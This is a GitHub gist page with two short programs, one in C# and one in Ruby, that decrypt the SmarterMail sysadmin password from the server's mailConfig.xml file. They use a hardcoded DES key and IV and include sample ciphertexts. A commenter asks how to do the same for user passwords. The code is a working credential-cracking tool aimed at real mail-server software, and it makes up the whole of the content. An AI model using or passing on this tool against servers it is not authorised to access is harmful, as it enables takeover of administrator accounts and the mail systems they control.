Last active
April 9, 2017 17:18
-
-
Save bcoles/8706120 to your computer and use it in GitHub Desktop.
Crack SmarterMail sysadmin password from 'mailConfig.xml' configuration file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Based on work by Joe Giron @theonlyevil1 | |
| // http://www.gironsec.com/blog/tag/cracking-smartermail/ | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Text; | |
| using System.IO; | |
| using System.Security.Cryptography; | |
| namespace TicketCounter | |
| { | |
| class Program | |
| { | |
| static void Main() | |
| { | |
| // examples - change this: | |
| byte[] pw = Convert.FromBase64String("6WLPtJenDcD+vaxI21q9Wg=="); // admin123 | |
| byte[] pw = Convert.FromBase64String("98QMbKFuTt/EwD/WwFcu5w=="); // adminadmin | |
| // decrypt | |
| byte[] Key = new byte[8] {(byte)185,(byte)154,(byte)82,(byte)212,(byte)88,(byte)119,(byte)233,(byte)24}; | |
| byte[] IV = new byte[8] {(byte)82,(byte)233,(byte)195,(byte)159,(byte)19,(byte)180,(byte)29,(byte)15}; | |
| SymmetricAlgorithm Coder; | |
| Coder = (SymmetricAlgorithm) DES.Create(); | |
| string result = Encoding.UTF8.GetString(PassThrough(pw, Coder.CreateDecryptor(Key, IV))); | |
| Console.WriteLine(result); | |
| } | |
| public static byte[] PassThrough(byte[] buf, ICryptoTransform transformation) | |
| { | |
| MemoryStream memoryStream = new MemoryStream(); | |
| CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, transformation, CryptoStreamMode.Write); | |
| cryptoStream.Write(buf, 0, buf.Length); | |
| cryptoStream.FlushFinalBlock(); | |
| memoryStream.Seek(0L, SeekOrigin.Begin); | |
| byte[] buffer = new byte[memoryStream.Length]; | |
| memoryStream.Read(buffer, 0, (int) memoryStream.Length); | |
| cryptoStream.Close(); | |
| memoryStream.Close(); | |
| return buffer; | |
| } | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # Based on work by Joe Giron @theonlyevil1 | |
| # http://www.gironsec.com/blog/tag/cracking-smartermail/ | |
| require 'openssl' | |
| require 'base64' | |
| # examples - change this: | |
| pw = "6WLPtJenDcD+vaxI21q9Wg==" # admin123 | |
| pw = "98QMbKFuTt/EwD/WwFcu5w==" # adminadmin | |
| # decrypt | |
| decipher = OpenSSL::Cipher::DES.new | |
| decipher.decrypt | |
| decipher.key = "\xb9\x9a\x52\xd4\x58\x77\xe9\x18" | |
| decipher.iv = "\x52\xe9\xc3\x9f\x13\xb4\x1d\x0f" | |
| puts decipher.update(Base64.decode64(pw)) + decipher.final |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello, this works for admin passwords. Is there a similar method for user passwords? thanks in advance.